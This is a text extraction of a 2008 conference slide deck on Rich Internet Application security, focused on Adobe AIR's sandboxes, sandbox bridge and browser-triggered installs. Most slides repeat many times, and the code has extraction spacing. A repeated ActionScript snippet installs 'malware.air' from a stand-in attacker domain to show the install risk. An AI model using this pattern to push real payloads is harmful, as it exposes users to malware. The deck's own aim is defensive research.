Ria World Bh 2008
-
Upload
kartikeyan-srinivasan -
Category
Documents
-
view
216 -
download
0
Transcript of Ria World Bh 2008
-
7/29/2019 Ria World Bh 2008
1/199
Living in the
RIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OSRIA vs the web
RIA vs RIA
Living in the RIA World:
Blurring the Line between Web and Desktop Security
Alex StamosDavid Thiel
Justine Osborne
iSEC Partners
August 6, 2008
http://find/http://goback/ -
7/29/2019 Ria World Bh 2008
2/199
-
7/29/2019 Ria World Bh 2008
3/199
-
7/29/2019 Ria World Bh 2008
4/199
Living in the
RIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OSRIA vs the web
RIA vs RIA
Whats a RIA?Rich Internet Applications
As with Web 2.0, ill-defined
May contain some of the following ingredients:
AJAXy Flashiness
Local storageOffline modeDecoupling from the browserAccess to lower level OS resources: sockets, hardwaredevices
Appearance of a traditional desktop applicationOur research has shown a huge disparity in features andsecurity design
http://find/ -
7/29/2019 Ria World Bh 2008
5/199
Living in the
RIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OSRIA vs the web
RIA vs RIA
Whats a RIA?Rich Internet Applications
As with Web 2.0, ill-defined
May contain some of the following ingredients:
AJAXy Flashiness
Local storageOffline modeDecoupling from the browserAccess to lower level OS resources: sockets, hardwaredevices
Appearance of a traditional desktop applicationOur research has shown a huge disparity in features andsecurity design
http://find/ -
7/29/2019 Ria World Bh 2008
6/199
Living in the
RIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIRMS Silverlight
Google Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OSRIA vs the web
RIA vs RIA
Whats a RIA?Rich Internet Applications
As with Web 2.0, ill-defined
May contain some of the following ingredients:
AJAXy Flashiness
Local storageOffline modeDecoupling from the browserAccess to lower level OS resources: sockets, hardwaredevices
Appearance of a traditional desktop applicationOur research has shown a huge disparity in features andsecurity design
http://find/ -
7/29/2019 Ria World Bh 2008
7/199
Living in the
RIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIRMS Silverlight
Google Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OSRIA vs the web
RIA vs RIA
Whats a RIA?Rich Internet Applications
As with Web 2.0, ill-defined
May contain some of the following ingredients:
AJAXy Flashiness
Local storageOffline modeDecoupling from the browserAccess to lower level OS resources: sockets, hardwaredevices
Appearance of a traditional desktop applicationOur research has shown a huge disparity in features andsecurity design
http://find/http://goback/ -
7/29/2019 Ria World Bh 2008
8/199
-
7/29/2019 Ria World Bh 2008
9/199
Living in the
RIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIRMS Silverlight
Google Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Whats a RIA?Rich Internet Applications
As with Web 2.0, ill-defined
May contain some of the following ingredients:
AJAXy Flashiness
Local storageOffline modeDecoupling from the browserAccess to lower level OS resources: sockets, hardwaredevices
Appearance of a traditional desktop applicationOur research has shown a huge disparity in features andsecurity design
http://find/ -
7/29/2019 Ria World Bh 2008
10/199
Living in the
RIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIRMS Silverlight
Google Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Whats a RIA?Rich Internet Applications
As with Web 2.0, ill-defined
May contain some of the following ingredients:
AJAXy Flashiness
Local storageOffline modeDecoupling from the browserAccess to lower level OS resources: sockets, hardwaredevices
Appearance of a traditional desktop applicationOur research has shown a huge disparity in features andsecurity design
http://find/http://goback/ -
7/29/2019 Ria World Bh 2008
11/199
-
7/29/2019 Ria World Bh 2008
12/199
Living in the
RIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIRMS Silverlight
Google Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Why use a RIA?
Web 2.0 no longer gets you VC funding
To increase responsiveness distribute data stores
between server and clientDesktop integration take advantage of OS UIfunctionality
Never learned any real programming languages
In short, web developers can now write full desktopapps. This could be good or bad.
http://find/http://goback/ -
7/29/2019 Ria World Bh 2008
13/199
-
7/29/2019 Ria World Bh 2008
14/199
-
7/29/2019 Ria World Bh 2008
15/199
Living in the
RIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIRMS Silverlight
Google Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Why use a RIA?
Web 2.0 no longer gets you VC funding
To increase responsiveness distribute data stores
between server and clientDesktop integration take advantage of OS UIfunctionality
Never learned any real programming languages
In short, web developers can now write full desktopapps. This could be good or bad.
http://find/http://goback/ -
7/29/2019 Ria World Bh 2008
16/199
Living in the
RIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIRMS Silverlight
Google Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Why use a RIA?
Web 2.0 no longer gets you VC funding
To increase responsiveness distribute data stores
between server and clientDesktop integration take advantage of OS UIfunctionality
Never learned any real programming languages
In short, web developers can now write full desktopapps. This could be good or bad.
http://find/http://goback/ -
7/29/2019 Ria World Bh 2008
17/199
RIA F k
-
7/29/2019 Ria World Bh 2008
18/199
Living in the
RIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIRMS Silverlight
Google Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
RIA FrameworksFight!
Ad b AIR
http://find/http://goback/ -
7/29/2019 Ria World Bh 2008
19/199
Living in the
RIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIRMS Silverlight
Google Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Adobe AIRQuick Summary
Runs disconnected Standalone app Privileged OS access Can launch itself
Local data storage Has an installer Raw network sockets Cross-domain XHR
Dedicated session management
Can talk to the calling DOM IPC mechanisms Proper SSL security
http://find/http://goback/ -
7/29/2019 Ria World Bh 2008
20/199
-
7/29/2019 Ria World Bh 2008
21/199
-
7/29/2019 Ria World Bh 2008
22/199
-
7/29/2019 Ria World Bh 2008
23/199
Adobe AIR
-
7/29/2019 Ria World Bh 2008
24/199
Living in theRIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIRMS Silverlight
Google Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the webRIA vs RIA
Adobe AIRWhat is Adobe AIR?
So its just like a Win32 program in the eyes of a securityanalyst?
Um, not reallyPower of AIR is the I in RIA
Can be invoked by browser with arguments, like ActiveX orFlashHas many native mechanisms for loading external content
Highly likely that developers will utilize Internet content.Thats the point.
Adobe AIR
http://find/ -
7/29/2019 Ria World Bh 2008
25/199
Living in theRIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIRMS Silverlight
Google Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the webRIA vs RIA
Adobe AIRWhat is Adobe AIR?
AIR is best thought of as an ActiveX or Full Trust .Netanalogue and not like Flash++
Code runs with full privileges, can install malwareNative mechanisms allow for interaction with untrustedworld
Fortunately, Adobe has seemed to learn some lessons fromActiveX
Adobe AIR
http://find/ -
7/29/2019 Ria World Bh 2008
26/199
Living in theRIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIRMS Silverlight
Google Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the webRIA vs RIA
Adobe AIRAdobe AIR Instantiation
AIR Applications are identified by an appID and pubIDpubID calculated from developer personal information andcertificate
SWF files can import functionality that allows them tointeract with AIR applications. From Adobe:
airSWFLoader . l o a d ( new URLRequest ( " h t t p : / / a i r d o w n l o a d . a d o b e . c o m /b r o w s e r a p i / a i r . s w f " ) , l o a d e r C o n t e x t ) ;
With airSWF classes, the SWF can check on theapplications install status and version
airSWF . g e t A p p l i c a t i o n V e r s i o n ( appID , pubID , v e r s i o n D e t e c t C a l l b a c k ) ;
Now that we know the version, we can instantiate
airSWF . l a u n c h A p p l i c a t i o n ( appID , pubID , a r g u m e n t s ) ;
Adobe AIR
http://find/http://goback/ -
7/29/2019 Ria World Bh 2008
27/199
Living in theRIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIRMS Silverlight
Google Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the webRIA vs RIA
Adobe AIRAdobe AIR Instantiation
AIR Applications are identified by an appID and pubIDpubID calculated from developer personal information andcertificate
SWF files can import functionality that allows them tointeract with AIR applications. From Adobe:
airSWFLoader . l o a d ( new URLRequest ( " h t t p : / / a i r d o w n l o a d . a d o b e . c o m /b r o w s e r a p i / a i r . s w f " ) , l o a d e r C o n t e x t ) ;
With airSWF classes, the SWF can check on theapplications install status and version
airSWF . g e t A p p l i c a t i o n V e r s i o n ( appID , pubID , v e r s i o n D e t e c t C a l l b a c k ) ;
Now that we know the version, we can instantiate
airSWF . l a u n c h A p p l i c a t i o n ( appID , pubID , a r g u m e n t s ) ;
http://find/ -
7/29/2019 Ria World Bh 2008
28/199
Adobe AIR
-
7/29/2019 Ria World Bh 2008
29/199
Living in theRIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIRMS Silverlight
Google Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the webRIA vs RIA
Adobe AIRAdobe AIR Instantiation
AIR Applications are identified by an appID and pubIDpubID calculated from developer personal information andcertificate
SWF files can import functionality that allows them tointeract with AIR applications. From Adobe:
airSWFLoader . l o a d ( new URLRequest ( " h t t p : / / a i r d o w n l o a d . a d o b e . c o m /b r o w s e r a p i / a i r . s w f " ) , l o a d e r C o n t e x t ) ;
With airSWF classes, the SWF can check on theapplications install status and version
airSWF . g e t A p p l i c a t i o n V e r s i o n ( appID , pubID , v e r s i o n D e t e c t C a l l b a c k ) ;
Now that we know the version, we can instantiate
airSWF . l a u n c h A p p l i c a t i o n ( appID , pubID , a r g u m e n t s ) ;
Adobe AIR
http://find/ -
7/29/2019 Ria World Bh 2008
30/199
Living in theRIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIRMS Silverlight
Google Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the webRIA vs RIA
Adobe AIRAdobe AIR Security Model
By default, code included in AIR application has full rights
New functionality in privileged APIs added to JavaScriptand ActionScriptSome restrictions on interacting with desktop in AIR 1.0Existing capabilities can be chained to run native codeRumors of additional native code capabilities in futurereleases
Adobe AIR
http://find/ -
7/29/2019 Ria World Bh 2008
31/199
Living in theRIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIRMS Silverlight
Google Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the webRIA vs RIA
dobeAdobe AIR Security Model
No code access security model as understood on othersystems, such as Java or .Net
Instead, five pre-defined sandboxes with fixed capabilitiesApplication Full perms. Default for code included withAIR appRemote Code downloaded from internet. Browser-likepermissions
Three intermediate permissions for local SWFs
Adobe AIR
http://find/ -
7/29/2019 Ria World Bh 2008
32/199
Living in theRIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIRMS Silverlight
Google Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the webRIA vs RIA
Adobe AIR Security Model
No code access security model as understood on othersystems, such as Java or .Net
Instead, five pre-defined sandboxes with fixed capabilitiesApplication Full perms. Default for code included withAIR appRemote Code downloaded from internet. Browser-likepermissions
Three intermediate permissions for local SWFs
http://find/ -
7/29/2019 Ria World Bh 2008
33/199
Adobe AIR
-
7/29/2019 Ria World Bh 2008
34/199
Living in theRIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIRMS Silverlight
Google Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the webRIA vs RIA
Adobe AIR Security Model
No code access security model as understood on othersystems, such as Java or .Net
Instead, five pre-defined sandboxes with fixed capabilitiesApplication Full perms. Default for code included withAIR appRemote Code downloaded from internet. Browser-likepermissions
Three intermediate permissions for local SWFs
http://find/http://goback/ -
7/29/2019 Ria World Bh 2008
35/199
Adobe AIR
-
7/29/2019 Ria World Bh 2008
36/199
Living in theRIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the webRIA vs RIA
Adobe AIR Security Model
AIR has many ways of loading executable content to run,such as HTML/JS and SWFs
Also many ways of getting external untrusted data
Network trafficArguments from browser invocationCommand line arguments
Application Sandbox
Is not supposed to be able to dynamically generate code
eval() is best example in JSGoal is to eliminate XSS and injection attacks that haveplagued Flash apps that have more kick with localprivileges
Adobe AIR
http://find/http://goback/ -
7/29/2019 Ria World Bh 2008
37/199
Living in theRIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the webRIA vs RIA
Adobe AIR Security Model
AIR has many ways of loading executable content to run,such as HTML/JS and SWFs
Also many ways of getting external untrusted data
Network trafficArguments from browser invocationCommand line arguments
Application Sandbox
Is not supposed to be able to dynamically generate codeeval() is best example in JSGoal is to eliminate XSS and injection attacks that haveplagued Flash apps that have more kick with localprivileges
http://find/http://goback/ -
7/29/2019 Ria World Bh 2008
38/199
-
7/29/2019 Ria World Bh 2008
39/199
-
7/29/2019 Ria World Bh 2008
40/199
Adobe AIRAdobe AIR Sec it Model
-
7/29/2019 Ria World Bh 2008
41/199
Living in theRIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the webRIA vs RIA
Adobe AIR Security Model
Seems like a reasonable security precaution. How will webdevelopers circumvent it?
They can look for mistakes in Adobes classification of
methodsBetter yet, use a Sandbox Bridge
Official method of moving data between sandboxesAn application can attach functions or variables to anobject available from multiple sandboxesDocumented as passing by value, not reference, althoughthis doesnt jive with how functions work
Adobe AIRAdobe AIR Security Model
http://find/ -
7/29/2019 Ria World Bh 2008
42/199
Living in theRIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the webRIA vs RIA
Adobe AIR Security Model
Seems like a reasonable security precaution. How will webdevelopers circumvent it?
They can look for mistakes in Adobes classification of
methodsBetter yet, use a Sandbox Bridge
Official method of moving data between sandboxesAn application can attach functions or variables to anobject available from multiple sandboxesDocumented as passing by value, not reference, althoughthis doesnt jive with how functions work
Adobe AIRAdobe AIR Security Model
http://find/ -
7/29/2019 Ria World Bh 2008
43/199
Living in theRIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the webRIA vs RIA
Adobe AIR Security Model
Seems like a reasonable security precaution. How will webdevelopers circumvent it?
They can look for mistakes in Adobes classification of
methodsBetter yet, use a Sandbox Bridge
Official method of moving data between sandboxesAn application can attach functions or variables to anobject available from multiple sandboxes
Documented as passing by value, not reference, althoughthis doesnt jive with how functions work
Adobe AIRAdobe AIR Security Model
http://find/http://goback/ -
7/29/2019 Ria World Bh 2008
44/199
Living in theRIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the webRIA vs RIA
Adobe AIR Security Model
First parent sets up Sandbox Bridge
v a r h i g h R i g h t s S t u f f = {};h i g h R i g h t s S t u f f . w r i t e T o F i l e = f u n c t i o n ( name , c o n t e n t ){
// W r it e t o f i l e w i th a i r . F i l e St r e a m}
document . g e t E l e m e n t B y I d ( " c h i l d " ) . contentWindow . p a r e n t S a n d b o x B r i d g e =h i g h R i g h t s S t u f f ;
Then child code (in a IFRAME) can access the function
window . p a r e n t S a n d b o x B r i d g e . w r i t e T o F i l e ( name , c o n t e n t ) ;
Adobe AIRAdobe AIR Security Model
http://find/http://goback/ -
7/29/2019 Ria World Bh 2008
45/199
Living in theRIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the webRIA vs RIA
Adobe AIR Security Model
First parent sets up Sandbox Bridge
v a r h i g h R i g h t s S t u f f = {};h i g h R i g h t s S t u f f . w r i t e T o F i l e = f u n c t i o n ( name , c o n t e n t ){
// W r it e t o f i l e w i th a i r . F i l e St r e a m}
document . g e t E l e m e n t B y I d ( " c h i l d " ) . contentWindow . p a r e n t S a n d b o x B r i d g e =h i g h R i g h t s S t u f f ;
Then child code (in a IFRAME) can access the function
window . p a r e n t S a n d b o x B r i d g e . w r i t e T o F i l e ( name , c o n t e n t ) ;
Adobe AIRInstalling AIR
http://find/ -
7/29/2019 Ria World Bh 2008
46/199
Living in theRIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the webRIA vs RIA
Installing AIR
AIR requires Flash 9
Can be installed via external binary or inside of Flash:
Adobe AIRInstalling an AIR Application
http://find/http://goback/ -
7/29/2019 Ria World Bh 2008
47/199
Living in theRIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS SilverlightGoogle Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the webRIA vs RIA
sta g a pp cat o
AIR applications can be bundled as binaries (*.air)
Can also be installed by a web page from inside a SWF
v a r u r l : S t r i n g = " h t t p : / / w w w . c y b e r v i l l a i n s . c o m / m a l w a r e . a i r " ;v a r r u n t i m e V e r s i o n : S t r i n g = " 1 . 0 " ;v a r a r g u m e n t s : A r r a y = [ " l a u n c h F r o m B r o w s e r " ] ;airSWF . i n s t a l l A p p l i c a t i o n ( u r l , r u n t i m e V e r s i o n , a r g u m e n t s ) ;
Creates an Open/Save prompt
Adobe AIRInstalling an AIR Application
http://find/ -
7/29/2019 Ria World Bh 2008
48/199
Living in theRIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS SilverlightGoogle Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the webRIA vs RIA
g pp
AIR applications can be bundled as binaries (*.air)
Can also be installed by a web page from inside a SWF
v a r u r l : S t r i n g = " h t t p : / / w w w . c y b e r v i l l a i n s . c o m / m a l w a r e . a i r " ;v a r r u n t i m e V e r s i o n : S t r i n g = " 1 . 0 " ;v a r a r g u m e n t s : A r r a y = [ " l a u n c h F r o m B r o w s e r " ] ;airSWF . i n s t a l l A p p l i c a t i o n ( u r l , r u n t i m e V e r s i o n , a r g u m e n t s ) ;
Creates an Open/Save prompt
Adobe AIRInstalling an AIR Application
http://find/ -
7/29/2019 Ria World Bh 2008
49/199
Living in theRIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS SilverlightGoogle Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the webRIA vs RIA
g pp
AIR applications can be bundled as binaries (*.air)
Can also be installed by a web page from inside a SWF
v a r u r l : S t r i n g = " h t t p : / / w w w . c y b e r v i l l a i n s . c o m / m a l w a r e . a i r " ;v a r r u n t i m e V e r s i o n : S t r i n g = " 1 . 0 " ;v a r a r g u m e n t s : A r r a y = [ " l a u n c h F r o m B r o w s e r " ] ;airSWF . i n s t a l l A p p l i c a t i o n ( u r l , r u n t i m e V e r s i o n , a r g u m e n t s ) ;
Creates an Open/Save prompt
Adobe AIRInstalling an AIR Application
http://find/ -
7/29/2019 Ria World Bh 2008
50/199
Living in theRIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS SilverlightGoogle Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
AIR applications can be bundled as binaries (*.air)
Can also be installed by a web page from inside a SWF
v a r u r l : S t r i n g = " h t t p : / / w w w . c y b e r v i l l a i n s . c o m / m a l w a r e . a i r " ;v a r r u n t i m e V e r s i o n : S t r i n g = " 1 . 0 " ;v a r a r g u m e n t s : A r r a y = [ " l a u n c h F r o m B r o w s e r " ] ;airSWF . i n s t a l l A p p l i c a t i o n ( u r l , r u n t i m e V e r s i o n , a r g u m e n t s ) ;
Creates an Open/Save prompt
Adobe AIRInstalling an AIR Application
http://find/ -
7/29/2019 Ria World Bh 2008
51/199
Living in theRIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS SilverlightGoogle Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Adobe supports signing AIR applications with commercialcertificates
Gives you this prompt:
Notice the default selection
Adobe AIRInstalling an AIR Application
http://find/http://goback/ -
7/29/2019 Ria World Bh 2008
52/199
Living in theRIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS SilverlightGoogle Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Adobe supports signing AIR applications with commercialcertificates
Gives you this prompt:
Notice the default selection
Adobe AIRInstalling an AIR Application
http://find/http://goback/ -
7/29/2019 Ria World Bh 2008
53/199
Living in theRIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS SilverlightGoogle Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Unfortunately, they also support self-signed certificates
Gives you this prompt:
Adobe AIRInstalling an AIR Application
http://find/http://goback/ -
7/29/2019 Ria World Bh 2008
54/199
Living in theRIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS SilverlightGoogle Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Actually, looks more like pre-IE7 ActiveXWhat am I complaining about? They give the correctinformation
True, but so did ActiveXAllowing users to install signed applets is dangerous enoughAllowing self-signed (which is same as unsigned) isterrifying
The popularity of ActiveX in IE5 and IE6 and the ability ofweb sites to pop open infinite prompts made it the premier
malware seeding mechanismAdobe Flash is more popular than IE ever was
Its almost impossible to install ActiveX now. Thats notan accident.
Adobe AIRInstalling an AIR Application
http://find/http://goback/ -
7/29/2019 Ria World Bh 2008
55/199
Living in theRIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS SilverlightGoogle Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Actually, looks more like pre-IE7 ActiveXWhat am I complaining about? They give the correctinformation
True, but so did ActiveXAllowing users to install signed applets is dangerous enoughAllowing self-signed (which is same as unsigned) isterrifying
The popularity of ActiveX in IE5 and IE6 and the ability ofweb sites to pop open infinite prompts made it the premier
malware seeding mechanismAdobe Flash is more popular than IE ever was
Its almost impossible to install ActiveX now. Thats notan accident.
Adobe AIRInstalling an AIR Application
http://find/ -
7/29/2019 Ria World Bh 2008
56/199
Living in theRIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS SilverlightGoogle Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Actually, looks more like pre-IE7 ActiveXWhat am I complaining about? They give the correctinformation
True, but so did ActiveXAllowing users to install signed applets is dangerous enoughAllowing self-signed (which is same as unsigned) isterrifying
The popularity of ActiveX in IE5 and IE6 and the ability ofweb sites to pop open infinite prompts made it the premier
malware seeding mechanismAdobe Flash is more popular than IE ever was
Its almost impossible to install ActiveX now. Thats notan accident.
Adobe AIRInstalling an AIR Application
http://find/ -
7/29/2019 Ria World Bh 2008
57/199
Living in theRIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS SilverlightGoogle Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Actually, looks more like pre-IE7 ActiveXWhat am I complaining about? They give the correctinformation
True, but so did ActiveXAllowing users to install signed applets is dangerous enough
Allowing self-signed (which is same as unsigned) isterrifying
The popularity of ActiveX in IE5 and IE6 and the ability ofweb sites to pop open infinite prompts made it the premier
malware seeding mechanismAdobe Flash is more popular than IE ever was
Its almost impossible to install ActiveX now. Thats notan accident.
Adobe AIRInstalling an AIR Application
http://find/ -
7/29/2019 Ria World Bh 2008
58/199
Living in theRIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS SilverlightGoogle Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Actually, looks more like pre-IE7 ActiveXWhat am I complaining about? They give the correctinformation
True, but so did ActiveXAllowing users to install signed applets is dangerous enough
Allowing self-signed (which is same as unsigned) isterrifying
The popularity of ActiveX in IE5 and IE6 and the ability ofweb sites to pop open infinite prompts made it the premier
malware seeding mechanismAdobe Flash is more popular than IE ever was
Its almost impossible to install ActiveX now. Thats notan accident.
Adobe AIRInstalling an AIR Application
http://find/ -
7/29/2019 Ria World Bh 2008
59/199
Living in theRIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS SilverlightGoogle Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Some suggestions
Change default actionAdd a countdown timer to discourage mindless
clickthroughThere is already a registry key to disable unsigned installprompts, turn it on by defaultStop distributing self-signed AIR applications fromAdobe.com
There is perhaps room for something between AIR andFlash without the rootkit abilities
Adobe AIRInstalling an AIR Application
http://find/ -
7/29/2019 Ria World Bh 2008
60/199
Living in theRIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS SilverlightGoogle Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Some suggestions
Change default actionAdd a countdown timer to discourage mindless
clickthroughThere is already a registry key to disable unsigned installprompts, turn it on by defaultStop distributing self-signed AIR applications fromAdobe.com
There is perhaps room for something between AIR andFlash without the rootkit abilities
Adobe AIRInstalling an AIR Application
http://find/http://goback/ -
7/29/2019 Ria World Bh 2008
61/199
Living in theRIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS SilverlightGoogle Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Some suggestions
Change default actionAdd a countdown timer to discourage mindless
clickthroughThere is already a registry key to disable unsigned installprompts, turn it on by defaultStop distributing self-signed AIR applications fromAdobe.com
There is perhaps room for something between AIR andFlash without the rootkit abilities
Adobe AIRInstalling an AIR Application
http://find/ -
7/29/2019 Ria World Bh 2008
62/199
Living in theRIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS SilverlightGoogle Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Some suggestions
Change default actionAdd a countdown timer to discourage mindless
clickthroughThere is already a registry key to disable unsigned installprompts, turn it on by defaultStop distributing self-signed AIR applications fromAdobe.com
There is perhaps room for something between AIR andFlash without the rootkit abilities
Adobe AIRInstalling an AIR Application
http://find/ -
7/29/2019 Ria World Bh 2008
63/199
Living in theRIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS SilverlightGoogle Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Some suggestions
Change default actionAdd a countdown timer to discourage mindless
